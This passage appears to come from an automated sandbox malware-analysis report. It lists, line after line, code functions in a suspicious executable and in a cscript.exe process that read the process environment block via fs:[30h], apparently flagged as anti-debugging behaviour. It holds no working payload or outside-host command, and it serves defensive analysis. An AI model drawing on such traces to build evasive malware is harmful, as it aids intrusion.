          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC962 mov eax, dword ptr fs:[00000030h]5_2_00FAC962
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC7D50 mov eax, dword ptr fs:[00000030h]5_2_00FC7D50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]5_2_00FCB944
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]5_2_00FCB944
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE3D43 mov eax, dword ptr fs:[00000030h]5_2_00FE3D43
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]5_2_00FD513A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]5_2_00FD513A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAD30 mov eax, dword ptr fs:[00000030h]5_2_00FAAD30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078CD6 mov eax, dword ptr fs:[00000030h]5_2_01078CD6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov ecx, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov ecx, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010614FB mov eax, dword ptr fs:[00000030h]5_2_010614FB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]5_2_0107070D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]5_2_0107070D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]5_2_0103FF10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]5_2_0103FF10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB76E2 mov eax, dword ptr fs:[00000030h]5_2_00FB76E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2AE4 mov eax, dword ptr fs:[00000030h]5_2_00FD2AE4
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106131B mov eax, dword ptr fs:[00000030h]5_2_0106131B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD16E0 mov ecx, dword ptr fs:[00000030h]5_2_00FD16E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD36CC mov eax, dword ptr fs:[00000030h]5_2_00FD36CC
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2ACB mov eax, dword ptr fs:[00000030h]5_2_00FD2ACB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE8EC7 mov eax, dword ptr fs:[00000030h]5_2_00FE8EC7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]5_2_00FBAAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]5_2_00FBAAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFAB0 mov eax, dword ptr fs:[00000030h]5_2_00FDFAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078B58 mov eax, dword ptr fs:[00000030h]5_2_01078B58
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]5_2_00FDD294
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]5_2_00FDD294
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078F6A mov eax, dword ptr fs:[00000030h]5_2_01078F6A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE927A mov eax, dword ptr fs:[00000030h]5_2_00FE927A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105D380 mov ecx, dword ptr fs:[00000030h]5_2_0105D380
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106138A mov eax, dword ptr fs:[00000030h]5_2_0106138A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB766D mov eax, dword ptr fs:[00000030h]5_2_00FB766D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01075BA5 mov eax, dword ptr fs:[00000030h]5_2_01075BA5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]5_2_010253CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]5_2_010253CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]5_2_00FE4A2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]5_2_00FE4A2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAE620 mov eax, dword ptr fs:[00000030h]5_2_00FAE620
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC3A1C mov eax, dword ptr fs:[00000030h]5_2_00FC3A1C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]5_2_00FDA61C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]5_2_00FDA61C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov ecx, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]5_2_00FAAA16
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]5_2_00FAAA16
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8A0A mov eax, dword ptr fs:[00000030h]5_2_00FB8A0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD8E00 mov eax, dword ptr fs:[00000030h]5_2_00FD8E00
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE37F5 mov eax, dword ptr fs:[00000030h]5_2_00FE37F5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061608 mov eax, dword ptr fs:[00000030h]5_2_01061608
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCDBE9 mov eax, dword ptr fs:[00000030h]5_2_00FCDBE9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105FE3F mov eax, dword ptr fs:[00000030h]5_2_0105FE3F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]5_2_0106AE44
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]5_2_0106AE44
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106EA55 mov eax, dword ptr fs:[00000030h]5_2_0106EA55
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01034257 mov eax, dword ptr fs:[00000030h]5_2_01034257
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]5_2_0105B260
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]5_2_0105B260
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078A62 mov eax, dword ptr fs:[00000030h]5_2_01078A62
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2397 mov eax, dword ptr fs:[00000030h]5_2_00FD2397
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDB390 mov eax, dword ptr fs:[00000030h]5_2_00FDB390
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8794 mov eax, dword ptr fs:[00000030h]5_2_00FB8794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB1B8F mov eax, dword ptr fs:[00000030h]5_2_00FB1B8F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB1B8F mov eax, dword ptr fs:[00000030h]5_2_00FB1B8F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FE87 mov eax, dword ptr fs:[00000030h]5_2_0103FE87
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD3B7A mov eax, dword ptr fs:[00000030h]5_2_00FD3B7A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD3B7A mov eax, dword ptr fs:[00000030h]5_2_00FD3B7A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FADB60 mov ecx, dword ptr fs:[00000030h]5_2_00FADB60
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBFF60 mov eax, dword ptr fs:[00000030h]5_2_00FBFF60
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]5_2_01070EA5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]5_2_01070EA5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01070EA5 mov eax, dword ptr fs:[00000030h]5_2_01070EA5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAF358 mov eax, dword ptr fs:[00000030h]5_2_00FAF358
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010246A7 mov eax, dword ptr fs:[00000030h]5_2_010246A7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FADB40 mov eax, dword ptr fs:[00000030h]5_2_00FADB40
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBEF40 mov eax, dword ptr fs:[00000030h]5_2_00FBEF40
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105FEC0 mov eax, dword ptr fs:[00000030h]5_2_0105FEC0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDE730 mov eax, dword ptr fs:[00000030h]5_2_00FDE730
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078ED6 mov eax, dword ptr fs:[00000030h]5_2_01078ED6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA4F2E mov eax, dword ptr fs:[00000030h]5_2_00FA4F2E
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA4F2E mov eax, dword ptr fs:[00000030h]5_2_00FA4F2E
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCF716 mov eax, dword ptr fs:[00000030h]5_2_00FCF716
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA70E mov eax, dword ptr fs:[00000030h]5_2_00FDA70E
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA70E mov eax, dword ptr fs:[00000030h]5_2_00FDA70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F2073 mov eax, dword ptr fs:[00000030h]10_2_047F2073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475746D mov eax, dword ptr fs:[00000030h]10_2_0475746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]10_2_04750050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]10_2_04750050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]10_2_047CC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]10_2_047CC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A44B mov eax, dword ptr fs:[00000030h]10_2_0476A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808CD6 mov eax, dword ptr fs:[00000030h]10_2_04808CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476BC2C mov eax, dword ptr fs:[00000030h]10_2_0476BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]10_2_0474B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]10_2_047B7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]10_2_047B6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]10_2_047F1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F14FB mov eax, dword ptr fs:[00000030h]10_2_047F14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]10_2_047B6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]10_2_0480740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]10_2_04804015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]10_2_04804015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047358EC mov eax, dword ptr fs:[00000030h]10_2_047358EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov ecx, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
